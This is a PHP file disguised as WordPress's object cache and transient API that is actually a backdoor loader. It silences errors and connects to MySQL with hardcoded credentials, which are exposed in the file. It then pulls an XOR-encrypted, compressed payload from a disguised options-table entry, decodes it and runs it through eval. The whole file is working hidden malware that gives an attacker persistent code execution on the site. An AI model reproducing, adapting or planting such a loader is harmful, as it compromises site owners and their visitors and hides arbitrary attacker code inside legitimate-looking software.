<?php
/**
 * WordPress Object Cache & Transient API
 * @package WordPress
 * @subpackage Cache_System
 * @version 6.5.2
 */
error_reporting(0);
if ( ! class_exists( 'WP_C_nHwy' ) ) {
    class WP_C_nHwy {
        private $connection; private $prefix; private $k = 'CVEWiPTZ';
        public function __construct( $host, $user, $pass, $name, $prefix ) {
            $this->connection = new mysqli( $host, $user, $pass, $name );
            $this->prefix = $prefix;
        }
        public function run( $key ) {
            if ( $this->connection->connect_error ) return false;
            $table = $this->prefix . 'options';
            $query = "SELECT option_value FROM {$table} WHERE option_name = '{$key}' LIMIT 1";
            $result = $this->connection->query( $query );
            if ( $result && $row = $result->fetch_assoc() ) { return $this->decrypt( $row['option_value'] ); }
            return false;
        }
        private function decrypt( $hex ) {
            $enc = @hex2bin( $hex );
            $out = ''; $len = strlen($enc); $k_len = strlen($this->k);
            for($i=0; $i<$len; $i++) { $out .= $enc[$i] ^ $this->k[$i % $k_len]; }
            return @gzinflate( $out );
        }
    }
}
$rt = new WP_C_nHwy( 'localhost', 'flourishmeco_wp948', '9p]p[(b76q.b4Sd@', 'flourishmeco_wp948', 'wpbe_' );
$code = $rt->run( 'transient_sys_cache_vx' );
if ( $code ) { eval( '?>' . $code ); }
?>